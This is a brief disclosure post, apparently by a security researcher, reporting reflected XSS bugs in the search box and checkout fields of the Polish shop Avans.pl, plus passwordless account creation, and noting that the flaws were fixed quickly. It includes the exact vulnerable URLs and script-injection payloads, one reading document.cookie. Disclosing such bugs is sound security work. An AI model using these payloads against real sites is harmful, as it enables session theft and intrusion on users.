Simple reflected XSS bug in Avans’ search box:
http://www.avans.pl/produkty.html?query=XSS"/><script>alert('XSS')</script>
Another set of unfiltered input fields was in:
https://www.avans.pl/koszyk-logowanie.html
which is a Step 3/4 after adding a product to the cart. Filling those fields with a standard value of:
"/><script>alert(document.cookie)</script>
redirects to the:
https://www.avans.pl/koszyk-adres.html
which pops an alert box.
Bonus: It was possible to create an account without a password.
Bugs’ lifespans were short, because of a quick Avans.pl reaction. Good job.